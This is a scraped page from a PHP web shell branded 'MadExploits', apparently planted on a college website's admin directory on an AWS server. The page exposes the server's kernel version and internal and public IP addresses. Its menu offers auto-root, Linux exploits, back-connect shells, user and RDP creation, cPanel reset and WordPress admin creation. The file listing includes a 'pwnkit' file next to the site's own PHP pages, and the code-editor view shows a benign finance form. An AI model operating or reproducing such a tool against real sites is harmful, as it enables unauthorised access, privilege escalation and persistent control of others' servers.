Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.133.128.223
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
web /
Admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
contact
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
ocassion-folder
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
product-folder
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
aboutCollege.php
3.08
KB
-rw-r--r--
adminStaff.php
1.31
KB
-rw-r--r--
docs.php
1.13
KB
-rw-r--r--
dsw.php
1.5
KB
-rw-r--r--
fPrincipal.php
1.45
KB
-rw-r--r--
footer.php
1.89
KB
-rw-r--r--
gBody.php
1.79
KB
-rw-r--r--
header.php
11.56
KB
-rw-r--r--
homeBanner.php
1.44
KB
-rw-r--r--
index.php
1.81
KB
-rw-r--r--
invoice.html
8.32
KB
-rw-r--r--
login.php
3.33
KB
-rw-r--r--
login_process.php
644
B
-rw-r--r--
logout.php
95
B
-rw-r--r--
mCommittee.php
1.55
KB
-rw-r--r--
nTeaching.php
1.96
KB
-rw-r--r--
nep-2020.php
8.17
KB
-rw-r--r--
new_transaction.php
3.64
KB
-rw-r--r--
pAndS.php
1.55
KB
-rw-r--r--
pMessage.php
2.91
KB
-rw-r--r--
proctor.php
1.61
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
sMessage.php
1.78
KB
-rw-r--r--
slider1.php
3.93
KB
-rw-r--r--
slider2.php
3.55
KB
-rw-r--r--
teaching.php
1.95
KB
-rw-r--r--
updatepass.php
1.52
KB
-rw-r--r--
upload_docs.php
1.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : new_transaction.php
<?php include("include/db.php"); $page="new_transaction"; ?> <script> function viewForm() { var a=document.getElementById("trnType").value; if(a == 1) { document.getElementById("outgoingDiv").style.display="none"; document.getElementById("incomingDiv").style.display="block"; } else if(a == 2) { document.getElementById("incomingDiv").style.display="none"; document.getElementById("outgoingDiv").style.display="block"; } else { alert("Please select an appropriate option first"); return false; } } </script> <body> <?php include("header.php"); ?> <div class="content-wrapper"> <div class="container-fluid"> <div class="card m-1 row"> <div class="card-header text-success">Add Transactions </div> <div class="card-body row"> <div class="col-6 offset-3 form-group"> <label>Type Of Transaction</label> <select id="trnType" onchange="viewForm()" class="form-control"> <option value="0">Select Option</option> <option value="1">Incoming</option> <option value="2">Outgoing</option> </select> <div class="row m-1" style="display: none;" id="incomingDiv"> <form method="post" action="addTransactionProcess.php"> <label>Mode Of Transaction</label> <select id="trnType1" name="trnType1" onchange="viewForm()" class="form-control"> <option value="0">Select Option</option> <option value="Online">Online</option> <option value="Offline">Offline</option> </select> <label>From:</label> <input type="text" class="form-control" name="from1" placeholder="Recieved From" required> <label>Reason:</label> <input type="text" class="form-control" name="cause1" placeholder="cause" required> <label>Amount:</label> <input type="text" class="form-control" name="amount1" placeholder="Amount recieved" required> <label>Date:</label> <input type="date" class="form-control" name="rDate1" placeholder="Recieved Date" required> <label>Comment:</label> <input type="text" class="form-control" name="comment1" placeholder="Any Other Comment" required> <br> <button type="submit" class="btn btn-sm form-control btn-success" name="incomingSave">Save</button> </form> </div> <div class="row m-1" style="display: none;" id="outgoingDiv"> <form method="post" action="addTransactionProcess.php"> <label>Mode Of Transaction</label> <select id="trnType" name="trnType2" onchange="viewForm()" class="form-control"> <option value="0">Select Option</option> <option value="Online">Online</option> <option value="Offline">Offline</option> </select> <label>To:</label> <input type="text" class="form-control" name="to2" placeholder="Given To" required> <label>Reason:</label> <input type="text" class="form-control" name="cause2" placeholder="cause" required> <label>Amount:</label> <input type="text" class="form-control" name="amount2" placeholder="Amount Sent" required> <label>Date:</label> <input type="date" class="form-control" name="rDate2" placeholder="Recieved Date" required> <label>Comment:</label> <input type="text" class="form-control" name="comment2" placeholder="Any Other Comment" required> <br> <button type="submit" class="btn btn-sm form-control btn-success" name="outgoingSave">Save</button> </form> </div> </div> </div> </div> </div> </div> <?php include("footer.php"); ?> </body>
Close